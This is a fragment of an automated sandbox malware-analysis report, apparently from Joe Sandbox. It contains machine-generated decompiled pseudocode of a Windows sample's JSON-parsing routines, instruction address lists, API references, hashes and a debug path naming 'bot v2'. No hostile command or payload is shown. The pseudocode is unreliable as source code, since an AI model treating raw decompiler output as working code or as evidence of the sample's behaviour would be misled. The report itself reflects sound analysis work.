						_t492 =  *((intOrPtr*)(_t889 - 0x2c5));
					}
					L79:
					return E00424900(_t492, _t656,  *(_t889 - 4) ^ _t889, _t850, _t887, _t888);
					L80:
				}
				L25:
				__ecx = __ebp - 0x45c;
				 *(__ebp - 0x3f8) = E00414FA0(__ebp - 0x45c, 0);
				 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
				 *(__ebp - 0x3f4) =  *(__ebp - 0x2a8) + 0x30;
				__eax = __ebp - 0x19c;
				__ecx =  *(__ebp - 0x3f4);
				__eax = E004201C0(__ebx,  *(__ebp - 0x3f4), __edi, __esi, __ebp - 0x19c);
				__ecx = __ebp - 0xf4;
				__eax = E00406320(__eflags, __ebp - 0xf4, "number overflow parsing \'", __eax);
				__edx = __ebp - 0x184;
				 *(__ebp - 0x3fc) = __eax;
				__eax =  *(__ebp - 0x3f8);
				__ecx =  *(__ebp - 0x3fc);
				__edx = __ebp - 0x5a4;
				 *(__ebp - 0x408) = E0040C390(__ebx, __edi, __esi, __eflags, __ebp - 0x5a4, 0x196,  *(__ebp - 0x3fc),  *(__ebp - 0x3f8));
				 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
				 *(__ebp - 0x400) =  *(__ebp - 0x2a8) + 0x30;
				__ecx = __ebp - 0x16c;
				__ecx =  *(__ebp - 0x400);
				 *(__ebp - 0x40c) = E004201C0(__ebx,  *(__ebp - 0x400), __edi, __esi, __ebp - 0x16c);
				 *(__ebp - 0x2a8) =  *(__ebp - 0x2a8) + 0x30;
				 *(__ebp - 0x404) =  *(__ebp - 0x2a8) + 0x30;
				__eax = __ebp - 0x54c;
				__ecx =  *(__ebp - 0x404);
				__ecx = E00420140( *(__ebp - 0x404), __ebp - 0x54c);
				 *(__ebp - 0x410) = __eax;
				__ecx =  *(__ebp - 0x408);
				__edx =  *(__ebp - 0x40c);
				__eax =  *(__ebp - 0x410);
				__ecx =  *(__ebp + 8);
				__eax = E00412100( *(__ebp + 8),  *(__ebp - 0x410),  *(__ebp - 0x40c),  *(__ebp - 0x408));
				 *(__ebp - 0x2c4) = __al;
				__ecx = __ebp - 0x16c;
				__eax = E00416980(__ebp - 0x16c);
				__ecx = __ebp - 0x5a4;
				__eax = E00416D90(__ebp - 0x5a4);
				__ecx = __ebp - 0x184;
				__eax = E00416980(__ebp - 0x184);
				__ecx = __ebp - 0xf4;
				__eax = E00416980(__ebp - 0xf4);
				__ecx = __ebp - 0x19c;
				__eax = E00416980(__ebp - 0x19c);
				__ecx = __ebp - 0x45c;
				__eax = E00416950(__ebp - 0x45c);
				__ecx = __ebp - 0x2bc;
				__eax = E00416CE0(__ecx);
				__al =  *(__ebp - 0x2c4);
				goto L79;
			}

0x0041268a
0x0041268a
0x0041268a
0x0041268a
0x0041268a
0x0041268a
0x0041268a
0x00412693
0x00412698
0x004126a1
0x004126a9
0x004126ae
0x004126b3
0x004126bb
0x00000000
0x00000000
0x0041281d
0x00412826
0x0041282c
0x0041282f
0x00412837
0x0041283f
0x00412847
0x00412849
0x00412868
0x00412c6c
0x00412c6c
0x00412c75
0x00412c75
0x00412c7b
0x00412c80
0x00412c83
0x00412c85
0x00000000
0x00000000
0x00412ca4
0x00412cb8
0x00412cc0
0x00412cc2
0x00412eb3
0x00412eb9
0x00412ebe
0x00412ec1
0x004131f2
0x004131f8
0x004131fc
0x0041326a
0x00413277
0x00413288
0x004132a8
0x004132b7
0x004132cf
0x004132fb
0x0041330a
0x00413322
0x00413331
0x00413350
0x00413356
0x00413373
0x0041337f
0x0041338a
0x00413395
0x004133a0
0x004133ab
0x004133b6
0x004133bb
0x004131fe
0x004131fe
0x00413201
0x00413206
0x00413209
0x0041320b
0x0041322a
0x00413238
0x0041323a
0x0041323c
0x0041324b
0x00413250
0x00413250
0x00413259
0x0041325e
0x00000000
0x0041320d
0x0041320d
0x0041320d
0x0041321a
0x0041321f
0x0041321f
0x0041320b
0x00412ec7
0x00412ec7
0x00412ed2
0x00412ed5
0x00413037
0x00413049
0x00413051
0x00413053
0x00413072
0x0041307d
0x00413080
0x004131e2
0x004131e8
0x00000000
0x00413086
0x00413086
0x00413093
0x004130a4
0x004130c4
0x004130d3
0x004130eb
0x00413117
0x00413126
0x0041313e
0x0041314d
0x0041316c
0x00413179
0x0041318f
0x0041319b
0x004131a6
0x004131b1
0x004131bc
0x004131c7
0x004131d2
0x004131d7
0x004131d7
0x00413055
0x00413055
0x00413055
0x00413062
0x00413067
0x00413067
0x00412edb
0x00412edb
0x00412ee8
0x00412ef9
0x00412f19
0x00412f28
0x00412f40
0x00412f6c
0x00412f7b
0x00412f93
0x00412fa2
0x00412fc1
0x00412fd5
0x00412fe4
0x00412ff0
0x00412ffb
0x00413006
0x00413011
0x0041301c
0x00413027
0x0041302c
0x0041302c
0x00412ed5
0x00412cc8
0x00412cc8
0x00412cce
0x00412cd3
0x00412cd6
0x00412ce8
0x00412ce8
0x00412cee
0x00412cf2
0x00412d60
0x00412d6d
0x00412d7b
0x00412d98
0x00412da7
0x00412dbf
0x00412deb
0x00412dfa
0x00412e12
0x00412e21
0x00412e40
0x00412e54
0x00412e63
0x00412e6f
0x00412e7a
0x00412e85
0x00412e8d
0x00412e98
0x00412ea3
0x00412ea8
0x00412cf4
0x00412cf4
0x00412cf7
0x00412cff
0x00412d01
0x00412d20
0x00412d2e
0x00412d30
0x00412d32
0x00412d41
0x00412d46
0x00412d46
0x00412d4f
0x00412d54
0x00000000
0x00412d03
0x00412d03
0x00412d03
0x00412d10
0x00412d15
0x00412d15
0x00412d01
0x00412cd8
0x00412cd8
0x00412cde
0x00000000
0x0041221b
0x00412231
0x00412c6e
0x00412c6e
0x00000000
0x00412237
0x00412237
0x00412240
0x0041224d
0x00412b19
0x00412b26
0x00412b34
0x00412b51
0x00412b60
0x00412b78
0x00412ba4
0x00412bb3
0x00412bcb
0x00412bda
0x00412bf9
0x00412bff
0x00412c1c
0x00412c28
0x00412c33
0x00412c3e
0x00412c46
0x00412c51
0x00412c5c
0x00412c61
0x00412253
0x00412253
0x00412259
0x00000000
0x00000000
0x00000000
0x004128d1
0x004128d3
0x004128d6
0x004128db
0x004128de
0x004128e0
0x004128ff
0x00412c6c
0x00000000
0x004128e2
0x004128e2
0x004128e2
0x004128e9
0x004128ef
0x004128f4
0x004128f4
0x00000000
0x00000000
0x0041286d
0x0041286f
0x00412872
0x00412877
0x0041287a
0x0041287c
0x0041289b
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x0041287e
0x0041287e
0x0041287e
0x00412885
0x0041288b
0x00412890
0x00412890
0x00000000
0x00000000
0x004128a0
0x004128a0
0x004128a8
0x004128ab
0x004128ad
0x004128cc
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x004128af
0x004128af
0x004128af
0x004128b6
0x004128bc
0x004128c1
0x004128c1
0x00000000
0x00000000
0x00412945
0x00412945
0x0041294b
0x0041294e
0x00412954
0x0041295c
0x0041295f
0x00412961
0x00412980
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x00412963
0x00412963
0x00412963
0x0041296a
0x00412970
0x00412975
0x00412975
0x00000000
0x00000000
0x00412985
0x00412985
0x0041298b
0x0041298e
0x00412993
0x00412995
0x00412998
0x0041299d
0x004129a0
0x004129a2
0x004129c1
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x004129a4
0x004129a4
0x004129a4
0x004129ab
0x004129b1
0x004129b6
0x004129b6
0x00000000
0x00000000
0x00412904
0x00412904
0x0041290a
0x0041290d
0x00412912
0x00412914
0x00412917
0x0041291c
0x0041291f
0x00412921
0x00412940
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x00412923
0x00412923
0x00412923
0x0041292a
0x00412930
0x00412935
0x00412935
0x00000000
0x00000000
0x00000000
0x00000000
0x004125fd
0x004125ff
0x00412602
0x00412607
0x0041260a
0x0041260c
0x0041262b
0x0041262b
0x00412636
0x00412639
0x0041266c
0x0041266c
0x00412673
0x0041267a
0x00412680
0x00000000
0x0041263b
0x0041263b
0x0041263b
0x0041263e
0x00412643
0x00412646
0x00412648
0x00412667
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x0041264a
0x0041264a
0x0041264a
0x00412651
0x00412657
0x0041265c
0x0041265c
0x00412648
0x0041260e
0x0041260e
0x0041260e
0x00412615
0x0041261b
0x00412620
0x00412620
0x00000000
0x00000000
0x00412260
0x00412265
0x0041226a
0x0041226f
0x0041228e
0x00412299
0x0041229c
0x004122cf
0x004122d5
0x004122d9
0x00412432
0x00412444
0x00412449
0x0041244c
0x0041244e
0x0041246d
0x00412478
0x0041247b
0x004125d4
0x004125d4
0x004125e8
0x004125f3
0x00000000
0x00412481
0x00412481
0x0041248e
0x0041249c
0x004124b9
0x004124c8
0x004124e0
0x0041250c
0x0041251b
0x00412533
0x00412542
0x00412561
0x00412575
0x00412584
0x00412590
0x0041259b
0x004125a6
0x004125ae
0x004125b9
0x004125c4
0x004125c9
0x004125c9
0x00412450
0x00412450
0x00412450
0x0041245d
0x00412462
0x00412462
0x004122df
0x004122df
0x004122ec
0x004122fa
0x00412317
0x00412326
0x0041233e
0x0041236a
0x00412379
0x00412391
0x004123a0
0x004123bf
0x004123c5
0x004123e2
0x004123ee
0x004123f9
0x00412404
0x0041240c
0x00412417
0x00412422
0x00412427
0x00412427
0x0041229e
0x0041229e
0x004122a1
0x004122a9
0x004122ab
0x004122ca
0x00412c6c
0x00412c6c
0x00000000
0x00412c6c
0x004122ad
0x004122ad
0x004122ad
0x004122ba
0x004122bf
0x004122bf
0x004122ab
0x00412271
0x00412271
0x00412271
0x0041227e
0x00412283
0x00412283
0x00000000
0x00000000
0x004129c6
0x004129c8
0x004129d3
0x004129de
0x004129e1
0x004129e6
0x004129ec
0x004129f3
0x004129fe
0x00412a0a
0x00412a0d
0x00412a13
0x00412a1a
0x00412a25
0x00412a2b
0x00412a32
0x00412a39
0x00412a42
0x00412a51
0x00412a5d
0x00412a60
0x00412a66
0x00412a6d
0x00412a78
0x00412a84
0x00412a87
0x00412a8d
0x00412a94
0x00412a9f
0x00412aa6
0x00412aac
0x00412ab3
0x00412aba
0x00412ac1
0x00412ac4
0x00412ac9
0x00412acf
0x00412ad5
0x00412ada
0x00412ae0
0x00412ae5
0x00412aeb
0x00412af0
0x00412af3
0x00412af8
0x00412afe
0x00412b03
0x00412b09
0x00412b0e
0x00000000
0x00000000
0x00412259
0x0041224d
0x00000000
0x00412231
0x004133ce
0x004133ce
0x00412cd6
0x00000000
0x00412cc2
0x00412c87
0x00412c87
0x00412c94
0x00412c99
0x00000000
0x00412c99
0x0041284b
0x0041284b
0x0041284b
0x00412858
0x0041285d
0x0041285d
0x004133d3
0x004133e0
0x00000000
0x004133e0
0x004126c1
0x004126c3
0x004126ce
0x004126da
0x004126dd
0x004126e8
0x004126ef
0x004126f5
0x00412700
0x00412707
0x00412710
0x0041271f
0x00412725
0x0041272c
0x00412738
0x00412747
0x00412753
0x00412756
0x0041275c
0x00412763
0x0041276e
0x0041277a
0x0041277d
0x00412783
0x0041278a
0x00412795
0x0041279c
0x004127a2
0x004127a9
0x004127b0
0x004127b7
0x004127ba
0x004127bf
0x004127c5
0x004127cb
0x004127d0
0x004127d6
0x004127db
0x004127e1
0x004127e6
0x004127ec
0x004127f1
0x004127f7
0x004127fc
0x00412802
0x00412807
0x0041280d
0x00412812
0x00000000

APIs

Part of subcall function 004201C0: task.LIBCPMTD ref: 0042028A

Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C408
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C410
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C418
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C420
Part of subcall function 0040C390: Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error.LIBCMTD ref: 0040C435
Part of subcall function 0040C390: task.LIBCPMTD ref: 0040C43D

task.LIBCPMTD ref: 004127CB
task.LIBCPMTD ref: 004127E1
task.LIBCPMTD ref: 004127EC
task.LIBCPMTD ref: 004127F7

Strings

number overflow parsing ', xrefs: 004126FB

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$Concurrency::scheduler_worker_creation_error::scheduler_worker_creation_error
String ID: number overflow parsing '
API String ID: 2520070614-3802681121
Opcode ID: e0c27544a1e2d2e8101cc1863e609a559dcb0a4cd09cc7ec551c648e55d78d5c
Instruction ID: 976e91f4f58855f62cafc7fa2d9d7886ec80fa57590a0a2307b944411b789f7b
Opcode Fuzzy Hash: e0c27544a1e2d2e8101cc1863e609a559dcb0a4cd09cc7ec551c648e55d78d5c
Instruction Fuzzy Hash: 745140B0D101289BCB28EB15DC51BEEB7B9AF54304F4041DEE64A66142EE345FD4CF99

Uniqueness

Uniqueness Score: -1.00%

Function 004138CA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E004138CA(void* __ebx, void* __edi, void* __esi, long long __fp0) {
				signed char _t463;
				void* _t464;
				signed char _t465;
				signed char _t466;
				signed char _t469;
				void* _t470;
				intOrPtr _t492;
				signed char _t494;
				signed char _t579;
				void* _t626;
				signed char _t647;
				void* _t656;
				void* _t887;
				void* _t888;
				signed int _t889;
				void* _t891;
				void* _t893;
				long long _t908;

				L0:
				while(1) {
					L0:
					_t908 = __fp0;
					_t888 = __esi;
					_t887 = __edi;
					_t656 = __ebx;
					E004200C0( *(_t889 - 0x2a8) + 0x30);
					 *((long long*)(_t889 - 0x424)) = _t908;
					asm("movsd xmm0, [ebp-0x424]");
					asm("movsd [esp], xmm0");
					_t463 = E00411E30( *(_t889 - 0x2a8) + 0x30);
					_t893 = _t891 - 8 + 8;
					if((_t463 & 0x000000ff) == 0) {
						break;
					}
					L26:
					_t464 = E00420170( *(_t889 - 0x2a8) + 0x30);
					_t893 = _t893 - 8;
					asm("movsd xmm0, [ebp-0x424]");
					asm("movsd [esp], xmm0");
					_t465 = E00421720( *((intOrPtr*)(_t889 + 8)), _t464);
					__eflags = _t465 & 0x000000ff;
					if((_t465 & 0x000000ff) != 0) {
						L28:
						while(1) {
							L49:
							while(1) {
								L51:
								_t466 = E0041EDD0(_t889 - 0x2bc);
								_t850 = _t466 & 0x000000ff;
								__eflags = _t466 & 0x000000ff;
								if(__eflags != 0) {
									break;
								}
								L53:
								_t469 = E004172F0(E0041ACC0(_t889 - 0x2bc, _t889 - 0x44c), __eflags);
								__eflags = _t469 & 0x000000ff;
								if((_t469 & 0x000000ff) == 0) {
									L63:
									_t470 = E00420190( *(_t889 - 0x2a8));
									__eflags = _t470 - 0xd;
									if(_t470 != 0xd) {
										L71:
										__eflags =  *( *(_t889 - 0x2a8) + 0x28) - 0xb;
										if(__eflags != 0) {
											L77:
											 *((intOrPtr*)(_t889 - 0x38c)) = E00414FA0(_t889 - 0x4bc, 0);
											E00415310(_t889 - 0xc4, __eflags, "object");
											 *((intOrPtr*)(_t889 - 0x390)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x2a4, 0xb, _t889 - 0xc4);
											 *((intOrPtr*)(_t889 - 0x388)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x394)) = E00420140( *((intOrPtr*)(_t889 - 0x388)), _t889 - 0x504);
											 *(_t889 - 0x3a0) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x6a4, 0x65,  *((intOrPtr*)(_t889 - 0x394)),  *((intOrPtr*)(_t889 - 0x390)),  *((intOrPtr*)(_t889 - 0x38c)));
											 *((intOrPtr*)(_t889 - 0x398)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x3a4)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x398)), _t887, _t888, _t889 - 0x28c);
											 *((intOrPtr*)(_t889 - 0x39c)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x3a8)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x39c)), _t889 - 0x510));
											_t850 =  *(_t889 - 0x3a0);
											 *((char*)(_t889 - 0x2d5)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x3a8)),  *((intOrPtr*)(_t889 - 0x3a4)),  *(_t889 - 0x3a0));
											E00416980(_t889 - 0x28c);
											E00416D90(_t889 - 0x6a4);
											E00416980(_t889 - 0x2a4);
											E00416980(_t889 - 0xc4);
											E00416950(_t889 - 0x4bc);
											E00416CE0(_t889 - 0x2bc);
											_t492 =  *((intOrPtr*)(_t889 - 0x2d5));
										} else {
											L72:
											_t494 = E0041F160( *((intOrPtr*)(_t889 + 8)), __eflags);
											_t850 = _t494 & 0x000000ff;
											__eflags = _t494 & 0x000000ff;
											if((_t494 & 0x000000ff) != 0) {
												L74:
												__eflags = E0041EDD0(_t889 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2ba1);
													E00430DB7(_t656, _t850, _t887, _t888, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t893 = _t893 + 0xc;
												}
												E00421D70(_t889 - 0x2bc, __eflags);
												 *(_t889 - 0x2a9) = 1;
												goto L1;
											} else {
												L73:
												 *((char*)(_t889 - 0x2d4)) = 0;
												E00416CE0(_t889 - 0x2bc);
												_t492 =  *((intOrPtr*)(_t889 - 0x2d4));
											}
										}
									} else {
										L64:
										__eflags = E00420190( *(_t889 - 0x2a8)) - 4;
										if(__eflags == 0) {
											L66:
											_t579 = E00420E20( *((intOrPtr*)(_t889 + 8)), E00420170( *(_t889 - 0x2a8) + 0x30));
											__eflags = _t579 & 0x000000ff;
											if((_t579 & 0x000000ff) != 0) {
												L68:
												__eflags = E00420190( *(_t889 - 0x2a8)) - 0xc;
												if(__eflags == 0) {
													L70:
													E00420190( *(_t889 - 0x2a8));
													goto L1;
												} else {
													L69:
													 *((intOrPtr*)(_t889 - 0x368)) = E00414FA0(_t889 - 0x4ac, 0);
													E00415310(_t889 - 0xac, __eflags, "object separator");
													 *((intOrPtr*)(_t889 - 0x36c)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x274, 0xc, _t889 - 0xac);
													 *((intOrPtr*)(_t889 - 0x364)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x370)) = E00420140( *((intOrPtr*)(_t889 - 0x364)), _t889 - 0x4ec);
													 *((intOrPtr*)(_t889 - 0x37c)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x684, 0x65,  *((intOrPtr*)(_t889 - 0x370)),  *((intOrPtr*)(_t889 - 0x36c)),  *((intOrPtr*)(_t889 - 0x368)));
													 *((intOrPtr*)(_t889 - 0x374)) =  *(_t889 - 0x2a8) + 0x30;
													 *(_t889 - 0x380) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x374)), _t887, _t888, _t889 - 0x25c);
													 *((intOrPtr*)(_t889 - 0x378)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x384)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x378)), _t889 - 0x4f8));
													_t850 =  *(_t889 - 0x380);
													 *((char*)(_t889 - 0x2d3)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x384)),  *(_t889 - 0x380),  *((intOrPtr*)(_t889 - 0x37c)));
													E00416980(_t889 - 0x25c);
													E00416D90(_t889 - 0x684);
													E00416980(_t889 - 0x274);
													E00416980(_t889 - 0xac);
													E00416950(_t889 - 0x4ac);
													E00416CE0(_t889 - 0x2bc);
													_t492 =  *((intOrPtr*)(_t889 - 0x2d3));
												}
											} else {
												L67:
												 *((char*)(_t889 - 0x2d2)) = 0;
												E00416CE0(_t889 - 0x2bc);
												_t492 =  *((intOrPtr*)(_t889 - 0x2d2));
											}
										} else {
											L65:
											 *((intOrPtr*)(_t889 - 0x344)) = E00414FA0(_t889 - 0x49c, 0);
											E00415310(_t889 - 0x94, __eflags, "object key");
											 *((intOrPtr*)(_t889 - 0x348)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x244, 4, _t889 - 0x94);
											 *((intOrPtr*)(_t889 - 0x340)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x34c)) = E00420140( *((intOrPtr*)(_t889 - 0x340)), _t889 - 0x4d4);
											 *((intOrPtr*)(_t889 - 0x358)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x664, 0x65,  *((intOrPtr*)(_t889 - 0x34c)),  *((intOrPtr*)(_t889 - 0x348)),  *((intOrPtr*)(_t889 - 0x344)));
											 *((intOrPtr*)(_t889 - 0x350)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x35c)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x350)), _t887, _t888, _t889 - 0x22c);
											 *((intOrPtr*)(_t889 - 0x354)) =  *(_t889 - 0x2a8) + 0x30;
											 *(_t889 - 0x360) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x354)), _t889 - 0x4e0));
											_t850 =  *(_t889 - 0x360);
											 *((char*)(_t889 - 0x2d1)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *(_t889 - 0x360),  *((intOrPtr*)(_t889 - 0x35c)),  *((intOrPtr*)(_t889 - 0x358)));
											E00416980(_t889 - 0x22c);
											E00416D90(_t889 - 0x664);
											E00416980(_t889 - 0x244);
											E00416980(_t889 - 0x94);
											E00416950(_t889 - 0x49c);
											E00416CE0(_t889 - 0x2bc);
											_t492 =  *((intOrPtr*)(_t889 - 0x2d1));
										}
									}
								} else {
									L54:
									_t626 = E00420190( *(_t889 - 0x2a8));
									__eflags = _t626 - 0xd;
									if(_t626 != 0xd) {
										L56:
										_t850 =  *(_t889 - 0x2a8);
										__eflags =  *( *(_t889 - 0x2a8) + 0x28) - 0xa;
										if(__eflags != 0) {
											L62:
											 *((intOrPtr*)(_t889 - 0x320)) = E00414FA0(_t889 - 0x48c, 0);
											E00415310(_t889 - 0x1c, __eflags, "array");
											 *((intOrPtr*)(_t889 - 0x324)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x214, 0xa, _t889 - 0x1c);
											 *((intOrPtr*)(_t889 - 0x31c)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x328)) = E00420140( *((intOrPtr*)(_t889 - 0x31c)), _t889 - 0x588);
											 *((intOrPtr*)(_t889 - 0x334)) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x644, 0x65,  *((intOrPtr*)(_t889 - 0x328)),  *((intOrPtr*)(_t889 - 0x324)),  *((intOrPtr*)(_t889 - 0x320)));
											 *((intOrPtr*)(_t889 - 0x32c)) =  *(_t889 - 0x2a8) + 0x30;
											 *((intOrPtr*)(_t889 - 0x338)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x32c)), _t887, _t888, _t889 - 0xdc);
											 *((intOrPtr*)(_t889 - 0x330)) =  *(_t889 - 0x2a8) + 0x30;
											 *(_t889 - 0x33c) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x330)), _t889 - 0x4c8));
											_t850 =  *(_t889 - 0x33c);
											 *((char*)(_t889 - 0x2d0)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *(_t889 - 0x33c),  *((intOrPtr*)(_t889 - 0x338)),  *((intOrPtr*)(_t889 - 0x334)));
											E00416980(_t889 - 0xdc);
											E00416D90(_t889 - 0x644);
											E00416980(_t889 - 0x214);
											E00416980(_t889 - 0x1c);
											E00416950(_t889 - 0x48c);
											E00416CE0(_t889 - 0x2bc);
											_t492 =  *((intOrPtr*)(_t889 - 0x2d0));
										} else {
											L57:
											_t647 = E0041F160( *((intOrPtr*)(_t889 + 8)), __eflags);
											__eflags = _t647 & 0x000000ff;
											if((_t647 & 0x000000ff) != 0) {
												L59:
												__eflags = E0041EDD0(_t889 - 0x2bc) & 0x000000ff;
												if(__eflags != 0) {
													_push(0x2b6b);
													E00430DB7(_t656, _t850, _t887, _t888, __eflags, L"!states.empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
													_t893 = _t893 + 0xc;
												}
												E00421D70(_t889 - 0x2bc, __eflags);
												 *(_t889 - 0x2a9) = 1;
												goto L1;
											} else {
												L58:
												 *((char*)(_t889 - 0x2cf)) = 0;
												E00416CE0(_t889 - 0x2bc);
												_t492 =  *((intOrPtr*)(_t889 - 0x2cf));
											}
										}
									} else {
										L55:
										E00420190( *(_t889 - 0x2a8));
										L1:
										while(1 != 0) {
											if(( *(_t889 - 0x2a9) & 0x000000ff) != 0) {
												L50:
												 *(_t889 - 0x2a9) = 0;
												goto L51;
											} else {
												L3:
												 *(_t889 - 0x2dc) =  *( *(_t889 - 0x2a8) + 0x28);
												if( *(_t889 - 0x2dc) > 0x10) {
													L48:
													 *((intOrPtr*)(_t889 - 0x2fc)) = E00414FA0(_t889 - 0x47c, 0);
													E00415310(_t889 - 0x7c, __eflags, "value");
													 *((intOrPtr*)(_t889 - 0x300)) = E0041F5F0(_t656,  *(_t889 - 0x2a8), _t887, _t888, __eflags, _t889 - 0x1fc, 0x10, _t889 - 0x7c);
													 *((intOrPtr*)(_t889 - 0x2f8)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x304)) = E00420140( *((intOrPtr*)(_t889 - 0x2f8)), _t889 - 0x570);
													 *(_t889 - 0x310) = E0040C460(_t656, _t887, _t888, __eflags, _t889 - 0x624, 0x65,  *((intOrPtr*)(_t889 - 0x304)),  *((intOrPtr*)(_t889 - 0x300)),  *((intOrPtr*)(_t889 - 0x2fc)));
													 *((intOrPtr*)(_t889 - 0x308)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x314)) = E004201C0(_t656,  *((intOrPtr*)(_t889 - 0x308)), _t887, _t888, _t889 - 0x1e4);
													 *((intOrPtr*)(_t889 - 0x30c)) =  *(_t889 - 0x2a8) + 0x30;
													 *((intOrPtr*)(_t889 - 0x318)) = E00417420(E00420140( *((intOrPtr*)(_t889 - 0x30c)), _t889 - 0x57c));
													_t850 =  *(_t889 - 0x310);
													 *((char*)(_t889 - 0x2cd)) = E00412130( *((intOrPtr*)(_t889 + 8)),  *((intOrPtr*)(_t889 - 0x318)),  *((intOrPtr*)(_t889 - 0x314)),  *(_t889 - 0x310));
													E00416980(_t889 - 0x1e4);
													E00416D90(_t889 - 0x624);
													E00416980(_t889 - 0x1fc);
													E00416980(_t889 - 0x7c);
													E00416950(_t889 - 0x47c);
													E00416CE0(_t889 - 0x2bc);
													_t492 =  *((intOrPtr*)(_t889 - 0x2cd));
												} else {
													L4:
													switch( *((intOrPtr*)( *(_t889 - 0x2dc) * 4 +  &M00414624))) {
														case 0:
															goto L48;
														case 1:
															L35:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF60( *(__ebp + 8), 1);
															__ecx = __al & 0x000000ff;
															__eflags = __ecx;
															if(__ecx != 0) {
																L37:
																L49:
																goto L51;
															} else {
																L36:
																 *((char*)(__ebp - 0x2c8)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c8));
															}
															goto L79;
														case 2:
															L29:
															__ecx =  *(__ebp + 8);
															__eax = E0041AF60(__ecx, 0);
															__edx = __al & 0x000000ff;
															__eflags = __edx;
															if(__edx != 0) {
																L31:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L30:
																 *((char*)(__ebp - 0x2c6)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c6));
															}
															goto L79;
														case 3:
															L32:
															__ecx =  *(__ebp + 8);
															E004216C0(__ecx) = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L34:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L33:
																 *((char*)(__ebp - 0x2c7)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2c7));
															}
															goto L79;
														case 4:
															L41:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
															__eax = E00420170( *(__ebp - 0x2a8) + 0x30);
															__ecx =  *(__ebp + 8);
															__eax = __al & 0x000000ff;
															__eflags = __al & 0x000000ff;
															if((__al & 0x000000ff) != 0) {
																L43:
																while(1) {
																	L49:
																	goto L51;
																}
															} else {
																L42:
																 *((char*)(__ebp - 0x2ca)) = 0;
																__ecx = __ebp - 0x2bc;
																__eax = E00416CE0(__ecx);
																__al =  *((intOrPtr*)(__ebp - 0x2ca));
															}
															goto L79;
														case 5:
															L44:
															__ecx =  *(__ebp - 0x2a8);
															__ecx =  *(__ebp - 0x2a8) + 0x30;
